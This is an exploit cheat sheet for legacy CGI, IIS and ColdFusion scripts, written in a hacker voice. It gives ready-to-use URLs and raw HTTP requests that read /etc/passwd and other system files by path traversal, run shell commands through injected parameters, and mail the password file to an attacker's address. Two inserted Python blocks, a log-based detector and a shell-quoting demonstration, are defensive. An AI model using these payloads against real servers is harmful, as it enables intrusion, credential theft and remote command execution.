***NOTE: THESE EXPLOITS CAN BE PATCHED AND/OR PREVENTED, SO SOME EXPLOITS MAY NOT WORK. ALSO I AM NOT RESPONSIBLE FOR ANYTHING YOU DO AFTER READING THIS ARTICLE BLA BLA BLA . ***
Let's begin...
ALSO NOTE THAT THESE ARE NOT COPIED OFF OF AN EXPLOIT SITE AND TOOK ME A LONG TIME TO WRITE SO ENJOY!
-<>-
PHF
A script which came standard with the popular Apache web server also contained a serious flaw. Incorrect parameter checks are done, and therefore literally any command you want can be executed on the system.
Exploit:
Using the URL:
http://www.thesite.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
will display the password file from the server.
-<>-
Test-Cgi
Anyone can remotely inventory the files on a machine.
Exploit:
Using the URL: http://www.thesite.com/cgi-bin/test-cgi?*
will display the contents of the server's Cgi directory.
Using the URL: /cgi-bin/test-cgi?/*
will display the contents of the server's root directory.
Both listings are returned via the QUERY_STRING field. However, it is also possible to get listings via the CONTENT_TYPE, CONTENT_LENGTH, HTTP_ACCEPT, HTTP_REFERER, PATH_INFO, PATH_TRANSLATED, REQUEST_METHOD, SERVER_PROTOCOL, and (with the help of rDNS) the REMOTE_HOST fields.
For example, to get a listing of the root directory via the SERVER_PROTOCOL field, you would telnet to the server on port 80 and use:
GET /cgi-bin/test-cgi?x> /*
-<>-
Fax Survey
If the HylaFAX package is installed (common on some older Linux distributions), you can send arbitrary commands running as the UID of the web server:
Exploit:
http://www.thesite.com/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd
The above example URL could expose the password file of the server.
-<>-
Netauth
Netauth is a web-based email management system for Windows NT and most UNIX platforms. This product contains a security hole that enables remote users to download local files, including files like /etc/shadow.
Exploit:
http://www.thesite.com/cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd
The above URL would retrieve the password file from the server.
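The entries so far share a handful of request shapes: a `%0a` (newline) or `%20` smuggled into a query (PHF, faxsurvey), a bare `*` or `/*` wildcard (test-cgi), and `../` traversal to `/etc/passwd` (Netauth). A web server administrator can spot all of them in ordinary access logs. The following detector is an added example, not code from this page or from any of the products named; the log lines are constructed in Common Log Format, the client addresses are documentation ranges, and the list of script names is a hand-picked subset of the ones catalogued here.

```python
import re
from urllib.parse import unquote

# Script names taken from the entries on this page (a subset, not exhaustive).
KNOWN_SCRIPTS = {
    "phf", "test-cgi", "nph-test-cgi", "faxsurvey", "netauth.cgi",
    "calender_admin.pl", "htmlscript", "webgais", "websendmail",
    "aglimpse", "rguest.exe", "wguest.exe", "webdist.cgi", "php.cgi",
    "perl.exe", "count.cgi", "showcode.asp", "codebrws.asp",
    "exprcalc.cfm", "formmail.pl", "cachemgr.cgi",
}

# "../" or "..\" anywhere in the decoded request (also catches %2e%2e%2f).
TRAVERSAL = re.compile(r"\.\.[/\\]")
# Shell separators and substitution that have no business in a CGI argument.
SHELL_META = re.compile(r"[;|`\n]|\$\(")
# Common Log Format: client ident user [time] "METHOD target PROTO" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) \S+" (\d{3}) \S+$')

# Constructed sample log: the first four lines mirror request shapes from
# this page, the last two are benign traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2000:13:55:36 -0700] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 1043
203.0.113.7 - - [10/Oct/2000:13:55:41 -0700] "GET /cgi-bin/test-cgi?* HTTP/1.0" 200 512
198.51.100.9 - - [10/Oct/2000:14:02:10 -0700] "GET /cgi-bin/netauth.cgi?cmd=show&page=../../../../etc/passwd HTTP/1.0" 404 210
198.51.100.9 - - [10/Oct/2000:14:02:30 -0700] "GET /iissamples/exair/howitworks/codebrws.asp HTTP/1.0" 200 8800
192.0.2.44 - - [10/Oct/2000:14:05:00 -0700] "GET /index.html HTTP/1.0" 200 2326
192.0.2.44 - - [10/Oct/2000:14:05:02 -0700] "GET /cgi-bin/search.cgi?q=apache+server HTTP/1.0" 200 4210
""".splitlines()


def analyze_request(raw_target):
    """Return the list of reasons a request target looks like a CGI attack.

    The target is percent-decoded first so that %0a, %2e%2e and %7c are
    judged by what the CGI script would actually receive.
    """
    decoded = unquote(raw_target)
    path, _, query = decoded.partition("?")
    script = path.rsplit("/", 1)[-1].lower()
    reasons = []
    if script in KNOWN_SCRIPTS:
        reasons.append(f"known-vulnerable script: {script}")
    if TRAVERSAL.search(decoded):
        reasons.append("directory traversal")
    if SHELL_META.search(decoded):
        reasons.append("shell metacharacter")
    if query == "*" or query.startswith("/*"):
        reasons.append("glob wildcard query (test-cgi style)")
    return reasons


def scan_log(lines):
    """Parse CLF lines and return one record per suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not CLF; skip rather than guess
        client, _timestamp, _method, target, status = m.groups()
        reasons = analyze_request(target)
        if reasons:
            hits.append({"client": client, "target": target,
                         "status": int(status), "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit["client"]} {hit["status"]} {hit["target"]}')
        for reason in hit["reasons"]:
            print(f"    - {reason}")
```

Note that a 404 still counts as a hit: the netauth.cgi line shows a probe against a script that is not installed, which is exactly the reconnaissance phase this page documents. The generic names (search.cgi, guestbook.pl) are deliberately left out of `KNOWN_SCRIPTS` because they match far too much legitimate traffic; the traversal and metacharacter checks catch abuse of those regardless of the script name.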
-<>-
Calender.pl
The vulnerability allows remote users to execute arbitrary commands on the web server with the privileges of the httpd process.
The calender_admin.pl script prompts the user for a configuration file to modify, and then in an attempt to authenticate the user, it passes the user input straight to perl open(). This can be easily exploited to execute arbitrary commands remotely.
Exploit:
http://www.thesite.com/cgi-bin/calender_admin.pl
Going to that URL brings up username, password and configuration file input fields. Ignore the username and password fields and enter:
|<command here>|
(With the pipes) in the configuration file field.
For example:
|ping 127.0.0.1|
and the command will be executed.
-<>-
HTML Script
Htmlscript has a vulnerability in it which allows you to access system files, presumably any file the web server user can access.
Exploit:
http://www.thesite.com/cgi-bin/htmlscript?../../../../etc/passwd
The above URL would get the password file from the server.
-<>-
Finger
Get a list of e-mail addresses you found for the site (let's pretend one of them is "kangaroo@acme.net", and that your email address is "your@email.org")
Go to the finger box, and type this in (changing these email addresses for the real ones):
kangaroo@acme.net; /bin/mail your@email.org < etc/password
This takes the password file through kangaroo@acme.net and emails it to your email address. If this works you now have the etc/password file in your mailbox.
-<>-
classifieds.cgi
Classifieds is a free CGI script for handling classified ads. There are multiple security holes in it that allow remote execution. Firstly, by setting your email address to something like "duke@viper.net.au</etc/password" you can read files remotely off the server.
Also, by setting the hidden variables on an html form, a remote user can force arbitrary commands to be executed. One example of this is modifying the following variable:
<input type="hidden" name="mailprog" value="/usr/sbin/sendmail">
Changing its value to another command will cause that alternate command to be executed.
-<>-
WebGais
WebGais is an interface to the GAIS search tool. It installs a few programs in /cgi-bin. The main utility is called "WebGais" and does the actual interfacing with the search tool.
It reads the query from a user form, and then runs the GAIS search engine for that query. The author tried to protect the program by using single quotes around the query when he passed it to a "system" command. But he forgot one VERY important thing: to strip single quotes from the query (this was done in Glimpse).
Exploit:
Telnet target.machine.com 80
POST /cgi-bin/webgais HTTP/1.0
Content-length: 85 (replace this with the actual length of the "exploit" line)
query=';mail+drazvan@pop3.kappa.ro</etc/passwd;echo'&output=subject&domain=paragraph
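Both calender_admin.pl above (user input handed straight to open()) and WebGais here fail for the same reason: the script builds a shell command string out of user input, and wrapping that input in single quotes does nothing once the input itself contains a single quote. The following is an added example, not the WebGais code or a fix from its author; it uses Python rather than Perl, `gais-search` is a placeholder program name, and the query string is constructed. It shows the words the shell would see for the quoted-string approach the page describes, for the same approach with proper escaping, and for the argv form that never involves a shell at all.

```python
import shlex
import subprocess
import sys


def unsafe_command(query):
    # What the page describes WebGais doing: wrap the query in single quotes
    # and hand the whole string to the shell. A single quote inside the query
    # closes the wrapper, and everything after it is interpreted by the shell.
    return f"gais-search '{query}'"


def quoted_command(query):
    # Escaping repair: shlex.quote() rewrites an embedded ' as '"'"' so the
    # shell sees exactly one word whatever the query contains.
    return "gais-search " + shlex.quote(query)


def safe_argv(query):
    # Preferred fix: no shell at all. The query becomes one argv element and
    # shell metacharacters are never interpreted.
    return ["gais-search", query]


def words_as_shell_sees(command):
    # Split a command line with POSIX shell quoting rules, i.e. the words the
    # shell would produce before running anything.
    return shlex.split(command)


def echo_via_argv(query):
    # Execute the argv form with shell=False. The child is this same Python
    # interpreter printing its first argument, standing in for the real
    # search binary, so the example runs anywhere Python does.
    result = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1])", query],
        capture_output=True, text=True, check=True,
    )
    return result.stdout.rstrip("\n")


if __name__ == "__main__":
    # Constructed query: a quote that closes the wrapper, then two extra
    # commands the shell would run if given unsafe_command(query).
    query = "foo';echo injected;echo '"
    print("unsafe :", words_as_shell_sees(unsafe_command(query)))
    print("quoted :", words_as_shell_sees(quoted_command(query)))
    print("argv   :", safe_argv(query))
    print("child got back:", echo_via_argv(query))
```

For the constructed query the unsafe form splits into four words, and the `;` characters end up outside any quotes, which is the page's "forgot to strip single quotes" bug in miniature. The quoted form collapses back to the original query as a single word, and the argv form never builds a string for a shell to parse, so there is nothing to strip.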
-<>-
Web Send mail
Websendmail is a Cgi-bin that comes with the WebGais package, which is an interface to the GAIS search tool. It is a PERL script that reads input from a form and sends e-mail to the specified destination.
Exploit:
Telnet target.machine.com 80
POST /cgi-bin/websendmail HTTP/1.0
Content-length: xxx (should be replaced with the actual length of the string passed to the server, in this case xxx=90)
receiver=;mail+your_address@somewhere.org</etc/passwd;&sender=a&rtnaddr=a&subject=a&content=a
-<>-
Aglimpse
Glimpse HTTP is an interface to the Glimpse search tool, written in PERL. A hole can allow you to execute any command on the remote system (as the owner of the http server).
Exploit Example:
http://www.thesite.com/cgi-bin/aglimpse/80IFS=5;CMD=5mail5thegnome@nmrc.org passwd;eval$CMD
-<>-
Webcom's Guestbook CGI vulnerability
Webcom's guestbook CGI application for Windows NT Web servers suffers from severe security problems that allow remote users to view local system files.
Exploit Example:
http://www.thesite.com/cgi-bin/rguest.exe?template=full-path-to-filename
Requesting a full path in the template parameter returns the contents of that system file.
-<>-
Webdist.cgi
A security flaw that lets anyone execute arbitrary commands with the privileges of the http daemon. (Root or nobody).
Exploit Example:
http://www.thesite.com/cgi-bin/webdist.cgi
-<>-
Wrap
This exploit allows anyone to get a listing for any directory with mode +755
Exploit Example:
http://www.thesite.com/cgi-bin/wrap
-<>-
PHP.cgi
A security flaw that lets an attacker read arbitrary files with the privileges of the http daemon. (Usually root or nobody).
Exploit Example:
http://www.thesite.com/cgi-bin/php.cgi
-<>-
Perl.exe
This exploit allows us to execute arbitrary perl code on a PC, remotely of course.
Exploit Example:
http://www.thesite.com/cgi-bin/perl.exe
-<>-
Nph-test-cgi
A security flaw that returns the listing of the /Cgi-Bin directory, thus revealing which CGIs are installed on the remote host.
Exploit Example: http://www.thesite.com/cgi-bin/nph-test-cgi
-<>-
Nph-publish.cgi
A security flaw that lets an attacker execute arbitrary commands with the privileges of the http daemon. (Usually root or nobody).
Exploit Example:
http://www.thesite.com/cgi-bin/nph-publish.cgi
-<>-
newdsn.exe
This great exploit allows any attacker like us to create files anywhere on the system if the NTFS permissions are not tight enough, and it can be used to overwrite the DSNs of existing databases.
Exploit Example: http://www.thesite.com/cgi-bin/scripts/tools/newdsn.exe
-<>-
JJ
A security flaw that lets an attacker execute arbitrary commands with the privileges of the http daemon. (Usually root or nobody).
Exploit Example: http://www.thesite.com/cgi-bin/jj
-<>-
info2www
A security flaw that lets us execute arbitrary commands with the privileges of the http daemon. (Usually root or nobody).
Exploit Example: http://www.thesite.com/cgi-bin/info2www
-<>-
Add-password.cgi
Look at the name of the pathway and go figure!
Exploit Example: http://www.thesite.com/cgi-bin/add-password.cgi
-<>-
imagemap.exe
This CGI application is vulnerable to a buffer overflow that would allow a remote user (that would be us for all you stupid people out there) to execute arbitrary commands with the privileges of the administrator's httpd server. (Either nobody or root)
Exploit Example: http://www.thesite.com/cgi-bin/imagemap.exe
-<>-
dumpenv.pl
This vulnerability gives up a lot of information about the web server configuration.
Exploit Example: http://www.thesite.com/cgi-bin/dumpenv
-<>-
guestbook.pl
An exploit that would let us execute arbitrary commands with the privileges of the http daemon. (Root or nobody)
Exploit Example: http://www.thesite.com/cgi-bin/guestbook.pl
-<>-
guestbook.cgi
An exploit that would let us execute arbitrary commands with the privileges of the http daemon. (Root or nobody)
Exploit Example: http://www.thesite.com/cgi-bin/guestbook.cgi
-<>-
Campas
An exploit that would let us execute arbitrary commands with the privileges of the http daemon. (Root or nobody)
Exploit Example: http://www.thesite.com/cgi-bin/campas
-<>-
Scripts
If the /scripts directory is browsable (probably not if they know ANYTHING about security), then this gives us valuable information about which default scripts they have installed, and also whether there are any custom scripts present which may have vulnerabilities.
Exploit Example: http://www.thesite.com/cgi-bin/scripts
-<>-
loadpage.cgi
This exploit comes with the EZShopper 3.0 package. We can open subdirectories and/or view some sensitive file contents like user data files.
Exploit Example: http://www.thesite.com/cgi-bin/ezshopper3/loadpage.cgi?user_id=id&file=/
-<>-
search.cgi
A flaw that allows us to execute commands on the server and view files outside the web path.
http://www.thesite.com/cgi-bin/search.cgi?user_id=1&database=../../../etc/passwd&template=foo&distinct=1
-<>-
CGI Counter
The popular CGI web page access counter version 4.0.7 by George Burgyan allows execution of arbitrary commands due to unchecked user input. Commands are executed with the same privilege as the web server, but other exploits can be used to get root access on an unpatched OS.
Exploit:
Using straight URL
http://www.example.com/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id
(This will display the username of a given system)
Passing commands in a variable:
$ Telnet www.example.com www
GET /cgi-bin/counterfiglet/nc/f=;sh%20-c%20"$HTTP_X" HTTP/1.0
X: pwd;ls -la /etc;cat /etc/password
$ Telnet www.example.com www
GET /cgi-bin/counter/nl/ord/lang=English(1);system("$ENV{HTTP_X}"); HTTP/1.0
X: echo;id;uname -a;w
-<>-
SGI Infosearch
The Info search subsystem is used to search and browse virtually all SGI on-line documentation. A vulnerability has been discovered in Infosearch.Cgi which could allow any remote user to view files on the vulnerable system with privileges of the user "nobody".
-<>-
Poll It
Poll It allows easy hosting of online polls on websites. However this CGI also enables remote attackers to read any world readable file on the server.
Exploit:
http://www.thesite.com/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/passwd
The above URL would retrieve the password file from the server.
-<>-
Robpoll
Robpoll is a free Cgi based admin program.
Exploit:
First go to:
http://www.thesite.com/cgi-bin/robpoll.cgi?Admin
You will have an option to change the password. The password by default is "Robpoll"; leaving it at the default compromises the system and its files.
-<>-
WebBanner
A security hole in the WebBanner CGI enables remote attackers to view certain files on the system, and possibly execute system commands as well.
Exploit:
http://www.thesite.com/random_banner/index.cgi?image_list=alternative_image.list&html_file=../../../../../etc/passwd
The above URL will retrieve the password file from the server.
-<>-
WebWho+
WebWho+ is a free Cgi script for executing whois queries via the www. Though it does perform checks for shell escape characters on some parameters, it misses the 'type' variable and allows for malicious input to be sent to a shell. It is possible to execute arbitrary commands on a webserver running WebWho+ v1.1 with the user ID of the webserver (usually nobody).
-<>-
FormMail.pl
A serious flaw in the popular CGI program Formmail.pl allows spammers to send anonymous emails.
Exploit Example:
http://www.thesite.com/cgi-bin/formmail.pl
-<>-
alibaba.pl
This exploit would allow you to have a directory listing of all files in the CGI directory. This could be used to find .pwl files and to find more directories and scripts to exploit.
Exploit Example: http://www.thesite.com/cgi-bin/alibaba.pl|dir
-<>-
input.bat
This exploit would let you execute arbitrary commands
Exploit Example: http://www.thesite.com/cgi-bin/input.bat?|dir....windows
-<>-
bigconf.cgi
A security flaw that lets us execute arbitrary commands with the privileges of the http daemon. (Usually root or nobody).
Exploit Example: http://www.thesite.com/cgi-bin/bigconf.cgi
-<>-
tst.bat
This flaw in tst.bat would allow us to read arbitrary files on a remote system
Exploit Example: http://www.thesite.com/cgi-bin/tst.bat
-<>-
idq.dll
This exploit would allow us to read arbitrary files on a remote system
Exploit Example: http://www.thesite.com/query.idq?CiTemplate=../../../somefile.ext
-<>-
FormHandler.cgi
The FormHandler CGI utility may allow us to download any file from vulnerable systems.
Exploit Example: http://www.thesite.com/formhandler.cgi
-<>-
showcode.asp
A sample Active Server Page (ASP) script installed by default on Microsoft's Internet Information Server (IIS) 4.0 would give us access to view any file on the same volume as the web server that is readable by the web server.
Exploit Example: http://www.thesite.com/msadc/Samples/SELECTOR/showcode.asp
-<>-
codebrws.asp
This exploit would allow us to view the source of any file in the web root with the extensions .asp, .inc, .htm or .html.
Exploit Example: http://www.thesite.com/iissamples/exair/howitworks/codebrws.asp
-<>-
htimage.exe
There is a buffer overflow in the remote htimage.exe when it is given the following request:
Exploit Example: http://www.thesite.com/cgi-bin/htimage.exe/AAAA[....]AAA?0,0
-<>-
wguest.exe
A request for http://www.thesite.com/cgi-bin/wguest.exe?template=c:\boot.ini will return the remote web server's boot.ini file.
Exploit Example: http://www.thesite.com/cgi-bin/wguest.exe?template=c:\boot.ini
-<>-
uploader.exe
A security flaw that lets anyone upload arbitrary Cgi on the server, and then execute them.
Exploit Example: http://www.thesite.com/cgi-bin/uploader.exe
-<>-
search97.vts
This exploit can be used to remotely view any file on a web server.
Exploit Example: http://www.thesite.com/cgi-bin/search97.vts
-<>-
rguest.exe
This exploit will return with the $winnt$.inf file.
Exploit Example: http://www.thesite.com/cgi-bin/rguest.exe?template=c:\winnt\system32\$winnt$.inf
-<>-
pfdisplay.cgi
If exploited, this may allow any user to view files on a vulnerable system with the privileges of the web server user. (Usually root or nobody)
Exploit Example: http://www.thesite.com/cgi-bin/pfdisplay.cgi
-<>-
Man.sh
This exploit would allow anyone who can execute CGIs through their web browser to run any system command with the user ID of the web server and obtain the output in a web page.
Exploit Example: http://www.thesite.com/cgi-bin/man.sh
-<>-
/scripts/iisadmin/bdir.htr
The file bdir.htr is a default IIS file which can give us a lot of information about the file system.
http://www.thesite.com/scripts/iisadmin/bdir.htr??c:
-<>-
Count.cgi
A buffer can be overflowed in the Count.cgi program, allowing remote http users to execute arbitrary commands on the target machine.
Exploit Example: http://www.thesite.com/cgi-bin/Count.cgi
-<>-
CGImail.exe
An exploit that we can use to gain access to confidential data or further escalate our privileges.
Exploit Example: http://www.thesite.com/scripts/CGImail.exe
-<>-
carbo.dll
This exploit can be used to remotely view any file on their web server.
Exploit Example: http://www.thesite.com/carbo.dll?icatcommand=file_to_view&catalogname=catalog
-<>-
args.bat
A security flaw that lets an attacker upload arbitrary files on the remote web server.
Exploit Example: http://www.thesite.com/cgi-bin/args.bat
-<>-
AnyForm2
This exploit can be used by us to email the web server's password file back to us.
Exploit Example: http://www.thesite.com/cgi-bin/AnyForm2
-<>-
get32.exe
A security flaw that lets anyone execute arbitrary commands with the privileges of the http daemon. (Root or nobody).
Exploit Example: http://www.thesite.com/cgi-bin/get32.exe
-<>-
Ews
A security flaw that lets anyone execute arbitrary commands with the privileges of the http daemon. (Root or nobody).
Exploit Example: http://www.thesite.com/cgi-bin/ews
-<>-
exprcalc.cfm
This exploit would allow us to view, delete and upload anything on a remote ColdFusion Application Server
Exploit Example: http://www.thesite.com/cfdocs/expeval/exprcalc.cfm
-<>-
ExAir
IIS comes with the sample site ExAir. The page /iissamples/exair/search/advsearch.asp
could be used to make IIS hang, thus preventing it from answering legitimate client requests.
Exploit Example: http://www.thesite.com/iissamples/exair/search/advsearch.asp
-<>-
ExAir
IIS comes with the sample site ExAir. The page /iissamples/exair/search/query.asp
could be used to make IIS hang, thus preventing it from answering legitimate client requests.
Exploit Example: http://www.thesite.com/iissamples/exair/search/query.asp
-<>-
ExAir
IIS comes with the sample site ExAir. The page /iissamples/exair/search/search.asp
could be used to make IIS hang, thus preventing it from answering legitimate client requests.
Exploit Example: http://www.thesite.com/iissamples/exair/search/search.asp
-<>-
Altavista
It would be possible to read the contents of any files on the remote host by using the Altavista Intranet Search Service, and performing the request below.
Exploit Example: GET http://www.thesite.com/cgi-bin/query?mss=%2e%2e/config
-<>-
input2.bat
It is possible to misuse this .bat file to make the remote server execute arbitrary commands.
Exploit Example: http://www.thesite.com/cgi-bin/input2.bat?|dir....windows
-<>-
envout.bat
It is possible to misuse this .bat file to make the remote server execute arbitrary commands.
Exploit Example: http://www.thesite.com/ssi/envout.bat
-<>-
/cd/../config/html/cnf_gi.htm
It is possible to access the remote host AxisStorpoint configuration with this exploit
Exploit Example: http://www.thesite.com/cd/../config/html/cnf_gi.htm
-<>-
cachemgr.cgi
RedHat Linux 6.0 installs a default squid cache manager without restricting access to it. This script could be used to perform a port scan from the CGI host machine.
Exploit Example: http://www.thesite.com/cgi-bin/cachemgr.cgi
-<>-
Remote web root
It was possible to get the location of a virtual web directory of a host by issuing the command below.
Exploit Example: GET http://www.thesite.com/cgi-bin/ls HTTP/1.0
-<>-
CGI
This is a real no-brainer. Is the cgi-bin browsable? It sounds stupid, but some people are stupid. Remember that.
Exploit Example: http://www.thesite.com/Cgi-Bin
-<>-
cgitest.exe
There is a buffer overrun in the cgitest.exe, which will allow us to execute arbitrary commands with the same privileges as the web server (root or nobody).
Exploit Example: http://www.thesite.com/cgi-bin/cgitest.exe
-<>-
ExprCalc.cfm
To display and delete any file on the system, use a URL of the following form:
Exploit Example: http://www.thesite.com/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=C:\thetargetfile
-<>-
getdrvrs.exe
Get the drivers from the Site.
Exploit Example: http://www.thesite.com/scripts/tools/getdrvrs.exe
-<>-
bnbform.cgi
Remote users can read arbitrary files on the file system.
Exploit Example: http://www.thesite.com/Cgi-Bin/bnbform.cgi
-<>-
survey.cgi
Remote users can execute commands with web server privileges
Exploit Example: http://www.thesite.com/Cgi-bin/survey.cgi
-<>-
.htaccess
This exploit would allow you to read files protected with .htaccess
http://www.thegnome.com/secure/.htaccess
-<>-
convert.bas
This exploit would allow you to read any file on the remote file system.
Exploit Example:
http://thesite.com/scripts/convert.bas?../anythingyouwanttoview
-<>-
THANKS FOR READING!!!!